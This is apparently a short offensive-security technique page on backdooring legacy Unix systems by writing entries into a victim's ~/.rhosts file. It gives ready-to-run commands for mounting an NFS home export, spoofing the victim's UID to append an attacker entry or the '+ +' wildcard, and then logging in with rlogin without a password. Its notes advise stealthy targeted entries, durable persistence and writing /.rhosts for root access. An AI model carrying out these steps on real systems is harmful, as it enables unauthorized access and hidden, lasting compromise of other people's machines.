The most direct trust abuse is to write the trust yourself: adding a line to a target user's ~/.rhosts grants the attacker passwordless rsh/rlogin/rexec access as that user, and the entry persists as a backdoor until removed. The whole attack reduces to obtaining a write into the target's home directory. That write comes from a writable home exported over NFS (where UID spoofing lets you write as the user), a file-write or path-traversal vulnerability in another service, or an existing foothold as another account or root. The entry + + trusts everyone; a specific host user entry is stealthier.
# the precondition is a write to the target's home; common via NFS UID spoofing
mount -t nfs <target>:/home /mnt && sudo -u \#<victim_uid> sh -c \
'echo "attacker-host attacker-user" >> /mnt/victim/.rhosts'
# or the maximal open-door entry
echo '+ +' >> /mnt/victim/.rhosts
# then access with no password
rlogin -l victim <target>
Exploitation notes#
- The enabling primitive is a home-directory write; the classic pairing is an NFS export with AUTH_SYS, where spoofing the victim's UID lets you write their
.rhostsas them. + +is maximal (any host, any user) and obvious; a targetedhost userentry trusting only your identity is quieter and still durable.- This is both access and persistence: the planted trust grants repeated passwordless re-entry; include it when establishing a durable foothold on legacy Unix.
- Root's trust lives in
/.rhosts(not covered byhosts.equiv); writing it grants passwordless root where you can reach that file.